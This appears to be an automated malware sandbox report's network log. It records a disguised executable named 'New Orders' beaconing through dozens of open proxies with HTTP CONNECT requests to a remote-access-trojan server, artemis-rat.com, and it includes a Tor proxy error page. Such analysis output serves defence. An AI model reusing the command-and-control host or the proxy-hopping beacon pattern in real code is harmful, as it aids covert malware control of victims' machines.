                                                                                        Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1563192.168.2.952998185.109.184.150531557672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.760973930 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.835997105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:52.839865923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1564192.168.2.95416238.48.98.38280807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.762079000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.836003065 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:52.839864016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:58.945302010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:11.038753986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:23.132476091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:35.132524014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:59.132601976 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:18:47.273188114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1565192.168.2.954251199.187.210.5441457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.762825966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1566192.168.2.95448194.45.74.6080807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.763099909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1567192.168.2.94989151.15.254.129163797672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.781961918 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.773471117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:50.246876001 CET729INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00
                                                                                        Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1568192.168.2.954116163.172.169.27163797672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.783075094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.984754086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:52.976636887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:58.976689100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:11.070003033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:23.073352098 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:35.179385900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:59.273175001 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:18:47.273199081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1569192.168.2.95444874.118.80.24431287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.783303976 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1570192.168.2.954449203.112.134.7456787672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.785754919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1571192.168.2.94987551.75.126.150341447672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.804136992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.984828949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:52.976634979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:58.976687908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:11.070002079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1572192.168.2.954499103.216.49.23380807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.817709923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1573192.168.2.954129128.199.165.63490937672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.948731899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1574192.168.2.953090201.20.118.146272347672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.948818922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:48.802042961 CET19INHTTP/1.1 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1575192.168.2.954507167.71.5.8331287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.952815056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.499272108 CET28INHTTP/1.1 400 Bad Request


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1576192.168.2.95416337.187.77.58495077672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.952994108 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.945252895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1577192.168.2.9530675.252.23.22031287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.953324080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.616578102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:48.260796070 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.539078951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:51.945413113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.445472956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:56.835860014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:01.648703098 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:02.497255087 CET39INHTTP/1.0 200 Connection established


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1578192.168.2.954575192.154.246.9690007672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.960469961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1579192.168.2.953145213.79.104.22880807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.961005926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:50.132493019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:53.190726042 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:59.242069960 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:11.291708946 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:23.445399046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:35.444979906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:59.445014954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1580192.168.2.954464175.183.82.22181977672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.961034060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1581192.168.2.954580104.18.234.218807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
